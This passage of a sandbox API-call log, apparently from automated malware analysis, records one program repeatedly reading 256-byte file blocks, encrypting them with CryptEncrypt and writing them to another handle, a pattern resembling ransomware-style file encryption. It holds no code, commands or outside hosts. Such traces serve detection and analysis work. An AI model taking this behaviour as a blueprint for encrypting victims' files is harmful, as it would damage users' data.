lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.039] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.039] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.039] GetLastError () returned 0x0 [0164.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.039] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.039] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.039] GetLastError () returned 0x0 [0164.039] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.040] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.040] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.040] GetLastError () returned 0x0 [0164.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.040] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.040] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.040] GetLastError () returned 0x0 [0164.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.040] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.040] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.040] GetLastError () returned 0x0 [0164.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.040] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.040] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.040] GetLastError () returned 0x0 [0164.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.040] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.040] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.040] GetLastError () returned 0x0 [0164.040] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.041] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.041] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.041] GetLastError () returned 0x0 [0164.041] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.042] GetLastError () returned 0x0 [0164.042] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.042] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.042] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.043] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.043] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.043] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.043] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.043] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.043] GetLastError () returned 0x0 [0164.043] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.043] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.044] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.044] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.044] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.044] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.044] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.044] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.044] GetLastError () returned 0x0 [0164.044] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.045] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.045] GetLastError () returned 0x0 [0164.045] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.045] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, 